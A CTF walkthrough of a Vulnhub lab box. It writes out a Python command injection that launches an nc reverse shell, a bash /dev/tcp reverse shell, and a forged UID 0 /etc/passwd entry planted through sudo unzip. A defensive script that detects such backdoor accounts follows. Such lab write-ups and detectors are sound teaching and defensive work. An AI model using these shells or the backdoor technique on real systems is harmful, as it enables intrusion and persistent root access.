Vulnhub – InfoSecWarrior CTF 2020 02 Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.18 -vv

Connecting to port 56563 with telnet:

Ok, there is a trick to it: we can send a command instead of a number:

__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444>/tmp/f')

And on our listening port we get a shell:

We upgrade the shell to a proper TTY with python3 -c 'import pty;pty.spawn("/bin/bash")' and then we view the file bla2-note:

The password czNjcjN0 is base64, which decodes to s3cr3t. Now let's view the /etc/group file:

The password didn't work for bla or ck04. Ok, we still have the SSH service, so let's take a look at it:

The password didn't work there either, but this might: cat /etc/*-release gave us:

The output shows CODENAME=bionic. As the banner said "Enumerate Hostname and Distro's codename of this box And try to get Secure Shell", we now use bionic as the password:

Ok, that's weird: we got the user flag but got kicked out, so let's try this, we are going to run bash -p:

Yes, it worked, but we got stuck as no command displays any output, so we are going to make another reverse shell using bash -i >& /dev/tcp/192.168.1.11/1234 0>&1

Now user ck04 has sudo privileges:

And the user bla has sudo privileges too:

Ok, now we are going to add a new user with root privileges to the /etc/passwd file:

Now we copy /etc/passwd to our location in bla's home directory, edit it and put inside it:

hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash

Now we are going to use the unzip command that we got from sudo -l: first we zip the edited file and then unzip it over /etc/passwd:

Now we su hacker; the password is 123456.
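The privilege escalation above leaves two tell-tale marks in /etc/passwd: a second UID 0 account and a password hash stored directly in the passwd file instead of /etc/shadow. The following audit script is an added example, not part of the original walkthrough; the names audit_passwd, Finding and SAMPLE_PASSWD are mine, and the sample passwd content is constructed (it includes the hacker line from the walkthrough). It generalises beyond this box to any extra UID 0 entry, any hash or empty password field in passwd, and malformed lines.

```python
from dataclasses import dataclass
from typing import List

# Constructed sample /etc/passwd content: a few normal entries plus the
# "hacker" line that the walkthrough above adds to the file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bla:x:1000:1000:bla:/home/bla:/bin/bash
ck04:x:1001:1001::/home/ck04:/bin/bash
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash
"""

# Password-field values that do NOT mean "hash stored here":
# "x" = look in /etc/shadow, "*" / "!" / "!!" = locked account.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    user: str
    reason: str


def audit_passwd(text: str) -> List[Finding]:
    """Hypothetical helper: flag passwd entries that look like a backdoor account."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line, f"line {lineno}: malformed entry ({len(fields)} fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(Finding(name, "empty password field (login without a password)"))
        elif pw not in SHADOWED_OR_LOCKED:
            # A hash here is honoured by the login path and bypasses /etc/shadow entirely.
            findings.append(Finding(name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            # Any account with UID 0 is root, whatever it is called.
            findings.append(Finding(name, "non-root account with UID 0"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.user}: {f.reason}")
```

On a live host, run the same function over the contents of /etc/passwd and alert on any finding; a file-integrity monitor on /etc/passwd catches the unzip-over-write itself.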
